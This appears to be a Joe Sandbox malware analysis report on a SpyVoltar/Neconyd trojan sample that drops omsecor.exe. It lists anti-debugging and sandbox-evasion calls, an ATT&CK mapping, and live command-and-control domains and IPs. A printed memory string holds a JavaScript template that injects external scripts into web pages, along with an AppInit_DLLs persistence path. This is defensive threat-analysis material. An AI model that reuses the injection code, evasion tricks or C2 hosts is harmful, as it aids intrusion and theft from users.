Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_0040350F
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_004039EA
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_0040350F
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_004039EA

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_0-5783
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_2-5783
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_0-5783
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_2-5783

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-5845
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_2-5769
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_2-5845
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-5716

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

API coverage: 8.6 %

Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6776	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 404	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\omsecor.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Source: C:\Windows\SysWOW64\omsecor.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: omsecor.exe, 00000001.00000002.1883482540.0000000000682000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWgRJJ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	API call chain: ExitProcess graph end node			graph_0-5874
Source: C:\Windows\SysWOW64\omsecor.exe	API call chain: ExitProcess graph end node			graph_2-5874

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CD66

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

0_2_004032B8

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,

0_2_004075D4

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	0_2_004032B8
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CD66
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	2_2_004032B8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CD66

Source: bd0wJGTae5.exe, omsecor.exe	Binary or memory string: Shell_TrayWnd
Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_timeCsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: /*

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040CB03 cpuid

0_2_0040CB03

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,

0_2_00407267

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00407499

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00406CB5 GetVersionExW,

0_2_00406CB5

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	121 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	11 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
bd0wJGTae5.exe	87%	ReversingLabs	Win32.Trojan.ButeRat
bd0wJGTae5.exe	100%	Avira	TR/SpyVoltar.absza
bd0wJGTae5.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\SysWOW64\omsecor.exe	100%	Avira	TR/SpyVoltar.absza
C:\Users\user\AppData\Roaming\omsecor.exe	100%	Avira	TR/SpyVoltar.absza
C:\Windows\SysWOW64\omsecor.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\omsecor.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
lousta.net	193.166.255.171	true	true	unknown
mkkuei4kdsz.com	15.197.204.56	true	true	unknown
ow5dirasuek.com	52.34.198.229	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://mkkuei4kdsz.com/	true	unknown
http://lousta.net/956/959.html	true	unknown
http://lousta.net/508/485.html	true	unknown
http://lousta.net/562/252.html	true	unknown
http://mkkuei4kdsz.com/516/243.html	true	unknown
http://ow5dirasuek.com/776/947.html	true	unknown
ht:/r.irsf.o/	true	unknown
http://ow5dirasuek.com/537/167.html	true	unknown
http://mkkuei4kdsz.com/353/421.html	true	unknown
http://mkkuei4kdsz.com/978/939.html	true	unknown
http://ow5dirasuek.com/292/164.html	true	unknown
http://lousta.net/740/238.html	true	unknown
http://lousta.net/333/645.html	true	unknown
http://mkkuei4kdsz.com/781/119.html	true	unknown
http://lousta.net/734/112.html	true	unknown
http://mkkuei4kdsz.com/488/933.html	true	unknown
ht:/w.irsf.o/	true	unknown
http://lousta.net/875/87.html	true	unknown
http://ow5dirasuek.com/546/102.html	true	unknown
http://lousta.net/547/467.html	true	unknown
http://lousta.net/78/665.html	true	unknown
http://lousta.net/263/482.html	true	unknown
http://ow5dirasuek.com/434/722.html	true	unknown
http://lousta.net/908/776.html	true	unknown
http://lousta.net/	true	unknown
http://lousta.net/528/262.html	true	unknown
http://mkkuei4kdsz.com/785/70.html	true	unknown
http://ow5dirasuek.com/945/466.html	true	unknown
http://lousta.net/497/157.html	true	unknown
http://mkkuei4kdsz.com/457/998.html	true	unknown
http://ow5dirasuek.com/	true	unknown
http://ow5dirasuek.com/763/794.html	true	unknown
http://lousta.net/527/338.html	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://ow5dirasuek.com/763/794.htmlZZ	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/781/119.htmlf	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/562/252.htmlY	omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.html$	omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/516/243.html0	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/776/947.htmlnZ	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/516/243.html&	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/776/947.htmlrZC-	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/537/167.htmlwm	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/562/252.htmlf	omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.html;L	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/78/665.htmlH	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/292/164.html.E	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/488/933.htmldZI-&	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.htmlD	omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/956/959.html0473447	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/908/776.htmla0	omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/537/167.html;Q	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/956/959.htmlw	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/263/482.html3	omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/781/119.html)	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/740/238.htmlx	omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.htmlA	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/781/119.html4	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.htmlN	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/528/262.html9Tk-.	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.htmlf	omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/353/421.html$E	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/497/157.htmlB	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.html#L	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.htmlULV	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/488/933.htmlasuek.com	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.htmlasuek.com	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/562/252.html.	omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	false	unknown
http://lousta.net/562/252.htmlaba	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/en-GB	omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/763/794.html6Z	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/546/102.html5L	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/488/933.htmlom	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/516/243.htmlwLt	omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.html3	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/457/998.html~	omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://mkkuei4kdsz.com/8.htmlshqos.dll.mui	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/547/467.html4Wx	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.html/	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/908/776.htmlFTv-1	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/p	omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp	false	unknown
http://lousta.ne	omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://ow5dirasuek.com/776/947.htmlPZ	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/562/252.htmlB	omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/292/164.htmlam	omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ow5dirasuek.com/945/466.html7	omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://lousta.net/734/112.htmlk	omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.166.255.171	lousta.net	Finland	1741	FUNETASFI	true
52.34.198.229	ow5dirasuek.com	United States	16509	AMAZON-02US	true
15.197.204.56	mkkuei4kdsz.com	United States	7430	TANDEMUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546805
Start date and time:	2024-11-01 16:02:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bd0wJGTae5.exe renamed because original name is a hash value
Original Sample Name:	497678a9f8adc08d092b720d45797ad245e3d9d7.exe
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@7/3@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 116
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: bd0wJGTae5.exe

Simulations

Behavior and APIs

Time	Type	Description
11:03:55	API Interceptor	31x Sleep call for process: omsecor.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.166.255.171	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	lousta.net/989/145.html
	Update-KB4890-x86.exe	Get hash	malicious	Unknown	Browse	www4.cedesunjerinkas.com/chr/wtb/lt.exe
	Update-KB4890-x86.exe	Get hash	malicious	Unknown	Browse	www4.cedesunjerinkas.com/chr/wtb/lt.exe
	document.log.scr.exe	Get hash	malicious	Unknown	Browse	www4.cedesunjerinkas.com/chr/wtb/lt.exe
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.synetik.net/
	cnzWgjUhS2.exe	Get hash	malicious	Neconyd	Browse	lousta.net/161/343.html
	Z0rY97IU6r.exe	Get hash	malicious	Neconyd	Browse	lousta.net/372/625.html
	2VJZxIY76V.exe	Get hash	malicious	Neconyd	Browse	lousta.net/766/881.html
	qIIGdGOTWO.exe	Get hash	malicious	Neconyd	Browse	lousta.net/240/311.html
	O0prB0zCWi.exe	Get hash	malicious	Neconyd	Browse	lousta.net/461/572.html
52.34.198.229	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/145/281.html
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	lygyvuj.com/login.php
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	lygyvuj.com/login.php
	cnzWgjUhS2.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/968/405.html
	Z0rY97IU6r.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/944/938.html
	2VJZxIY76V.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/643/773.html
	RfdNuhaVvG.exe	Get hash	malicious	Sakula RAT	Browse	www.savmpet.com/photo/bcyybe-1288432018.jpg?resid=5281296
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	lygyvuj.com/login.php
	qIIGdGOTWO.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/342/85.html
	O0prB0zCWi.exe	Get hash	malicious	Neconyd	Browse	ow5dirasuek.com/115/979.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ow5dirasuek.com	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	cnzWgjUhS2.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	Z0rY97IU6r.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	2VJZxIY76V.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	qIIGdGOTWO.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	O0prB0zCWi.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	djvu452.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	gdvfd35.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	v48ge.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	moviename.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
mkkuei4kdsz.com	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	15.197.204.56
	cnzWgjUhS2.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	Z0rY97IU6r.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	2VJZxIY76V.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	qIIGdGOTWO.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	O0prB0zCWi.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	djvu452.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	gdvfd35.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	v48ge.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	moviename.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
lousta.net	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	cnzWgjUhS2.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	Z0rY97IU6r.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	2VJZxIY76V.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	qIIGdGOTWO.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	O0prB0zCWi.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	djvu452.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	v48ge.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	moviename.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	voltage.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FUNETASFI	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	Update-KB4890-x86.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	Update-KB4890-x86.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	document.log.scr.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	j3Lr4Fk7Kb.elf	Get hash	malicious	Mirai	Browse	86.50.36.169
	nabarm.elf	Get hash	malicious	Unknown	Browse	130.232.111.233
	splarm.elf	Get hash	malicious	Unknown	Browse	192.98.38.193
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	157.24.20.223
	nklarm5.elf	Get hash	malicious	Unknown	Browse	193.166.100.123
	jklppc.elf	Get hash	malicious	Unknown	Browse	128.214.222.213
AMAZON-02US	dlr.arm6.elf	Get hash	malicious	Okiru	Browse	54.217.10.153
	zmap.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	54.171.230.55
	https://woobox.com/sf4hxr	Get hash	malicious	HTMLPhisher	Browse	52.217.197.137
